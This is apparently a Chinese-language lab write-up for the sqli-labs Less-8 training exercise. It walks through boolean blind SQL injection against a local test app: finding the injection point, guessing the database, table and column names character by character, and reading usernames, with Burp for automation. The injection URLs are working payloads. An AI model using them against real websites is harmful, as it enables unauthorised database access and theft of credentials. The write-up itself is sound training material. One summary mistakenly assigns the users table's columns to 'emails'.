文章目录
Sqlilabs-less8
1、判断注入点
http://127.0.0.1/sqlilabs/Less-8/?id=1' and 1=1%23
2、爆字段
http://127.0.0.1/sqlilabs/Less-8/?id=1' order by 3%23
3、判断数据库
联合查询无果后尝试盲注
(1)判断数据库名长度
http://127.0.0.1/sqlilabs/Less-8/?id=1' and length(database())=8 %23
(2)判断数据库名称
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),1,1)='s' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr(database(),2,1)='e' %23
······
数据库名:security
4、判断表
(1)有几个表
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 %23
(2)分别判断表长度
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 0,1)=6 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 1,1)=8 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 2,1)=7 %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(table_name) from information_schema.tables where table_schema = 'security' limit 3,1)=5 %23
数据库:security
表1:长度为6
表2:长度为8
表3:长度为7
表4:长度为5
(3)分别判断表名称
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),1,1)='e' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema = 'security' limit 0,1),2,1)='m' %23
······
数据库:security
表1:emails
表2:referers
表3:uagents
表4:users
可以使用burp跑一下,对比长度判断回显
5、判断列
判断可得用户数据可能存放在users表中
(1)判断表中有几个字段(有几列)
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name = 'users')=3 %23
······
(2)判断列长度
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1)=2 %23
(3)判断列名
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),1,1)='i' %23
http://127.0.0.1/sqlilabs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name = 'users' limit 0,1),2,1)='d' %23
······
数据库:security
表1:emails,3列
id
username
password
表2:referers
表3:uagents
表4:users
6、读取数据
(1)判断几个数据
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select count(username) from users)=13 %23
(2)判断数据长度
http://127.0.0.1/sqlilabs/Less-8/?id=1' and (select length(username) from users limit 0,1)=4 %23
······
跑burp得
数据库:security
表1:emails,3列
id
username
长4
长8
长5
长6
长6
长8
长6
长5
长6
长6
长6
长7
长6
password
(3)读数据
and ascii(substr((select username from users limit 0,1),1,1))=68%23
一次跑burp得出数据
密码同理